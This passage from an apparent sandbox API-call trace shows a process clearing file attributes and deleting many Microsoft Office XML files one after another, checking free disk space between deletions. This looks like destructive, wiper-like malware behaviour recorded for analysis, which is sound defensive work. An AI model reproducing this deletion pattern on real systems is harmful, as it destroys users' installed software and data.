lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.513] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML", dwFileAttributes=0x80) returned 1 [0080.513] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl109.xml")) returned 1 [0080.516] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.610] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML", dwFileAttributes=0x80) returned 1 [0080.610] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl110.xml")) returned 1 [0080.619] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML", dwFileAttributes=0x80) returned 1 [0080.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGLBL111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pglbl111.xml")) returned 1 [0080.651] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML", dwFileAttributes=0x80) returned 1 [0080.665] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN001.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn001.xml")) returned 1 [0080.672] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML", dwFileAttributes=0x80) returned 1 [0080.680] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN002.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn002.xml")) returned 1 [0080.683] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML", dwFileAttributes=0x80) returned 1 [0080.688] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN010.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn010.xml")) returned 1 [0080.693] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML", dwFileAttributes=0x80) returned 1 [0080.711] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN011.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn011.xml")) returned 1 [0080.715] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.724] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML", dwFileAttributes=0x80) returned 1 [0080.724] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN020.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn020.xml")) returned 1 [0080.727] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.742] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML", dwFileAttributes=0x80) returned 1 [0080.742] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN022.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn022.xml")) returned 1 [0080.745] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.749] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML", dwFileAttributes=0x80) returned 1 [0080.749] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN026.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn026.xml")) returned 1 [0080.752] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.756] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML", dwFileAttributes=0x80) returned 1 [0080.757] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN027.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn027.xml")) returned 1 [0080.759] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML", dwFileAttributes=0x80) returned 1 [0080.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN044.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn044.xml")) returned 1 [0080.767] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML", dwFileAttributes=0x80) returned 1 [0080.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN048.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn048.xml")) returned 1 [0080.844] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML", dwFileAttributes=0x80) returned 1 [0080.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN054.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn054.xml")) returned 1 [0080.859] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.863] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML", dwFileAttributes=0x80) returned 1 [0080.863] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN058.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn058.xml")) returned 1 [0080.866] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.878] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML", dwFileAttributes=0x80) returned 1 [0080.878] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN065.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn065.xml")) returned 1 [0080.881] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0080.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML", dwFileAttributes=0x80) returned 1 [0080.887] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN075.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn075.xml")) returned 1 [0080.890] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML", dwFileAttributes=0x80) returned 1 [0081.019] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN081.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn081.xml")) returned 1 [0081.021] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML", dwFileAttributes=0x80) returned 1 [0081.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN082.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn082.xml")) returned 1 [0081.044] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.050] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML", dwFileAttributes=0x80) returned 1 [0081.050] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN086.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn086.xml")) returned 1 [0081.053] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML", dwFileAttributes=0x80) returned 1 [0081.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN089.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn089.xml")) returned 1 [0081.062] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML", dwFileAttributes=0x80) returned 1 [0081.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN090.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn090.xml")) returned 1 [0081.078] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML", dwFileAttributes=0x80) returned 1 [0081.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN092.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn092.xml")) returned 1 [0081.085] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML", dwFileAttributes=0x80) returned 1 [0081.089] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN095.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn095.xml")) returned 1 [0081.094] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.098] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML", dwFileAttributes=0x80) returned 1 [0081.098] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN096.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn096.xml")) returned 1 [0081.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML", dwFileAttributes=0x80) returned 1 [0081.110] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN097.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn097.xml")) returned 1 [0081.113] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML", dwFileAttributes=0x80) returned 1 [0081.120] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN102.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn102.xml")) returned 1 [0081.123] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML", dwFileAttributes=0x80) returned 1 [0081.132] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN103.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn103.xml")) returned 1 [0081.135] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML", dwFileAttributes=0x80) returned 1 [0081.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN105.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn105.xml")) returned 1 [0081.142] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML", dwFileAttributes=0x80) returned 1 [0081.146] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn107.xml")) returned 1 [0081.149] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML", dwFileAttributes=0x80) returned 1 [0081.155] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn108.xml")) returned 1 [0081.157] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML", dwFileAttributes=0x80) returned 1 [0081.162] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn109.xml")) returned 1 [0081.164] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.173] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML", dwFileAttributes=0x80) returned 1 [0081.173] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn110.xml")) returned 1 [0081.176] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML", dwFileAttributes=0x80) returned 1 [0081.210] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn111.xml")) returned 1 [0081.215] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.222] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML", dwFileAttributes=0x80) returned 1 [0081.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pg_index.xml")) returned 1 [0081.225] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.225] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.225] CoTaskMemFree (pv=0x506980) [0081.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.230] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.230] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.230] CoTaskMemFree (pv=0x506980) [0081.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.231] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.231] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.231] CoTaskMemFree (pv=0x506980) [0081.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.232] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.232] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.232] CoTaskMemFree (pv=0x506980) [0081.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.232] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.232] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.232] CoTaskMemFree (pv=0x506980) [0081.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.237] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0081.237] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0081.237] CoTaskMemFree (pv=0x506980) [0081.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0081.246] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0081.251] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML", dwFileAttributes=0x80) returned 1 [0081.251] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\AD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\ad.xml")) returned 1 [0081.254] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 